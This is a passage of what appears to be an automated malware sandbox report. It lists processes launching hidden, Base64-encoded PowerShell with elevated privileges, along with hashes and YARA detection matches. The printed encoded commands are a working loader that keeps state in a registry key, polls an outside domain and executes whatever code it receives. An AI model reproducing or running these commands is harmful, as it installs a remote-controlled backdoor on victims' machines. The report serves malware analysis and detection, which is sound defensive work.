0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA==""
Imagebase:0x4a400000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:2
Start time:17:42:09
Start date:23/06/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Imagebase:0x4a400000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:3
Start time:17:42:09
Start date:23/06/2022
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Imagebase:0x21d70000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888441908.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:high

Disassembly

No disassembly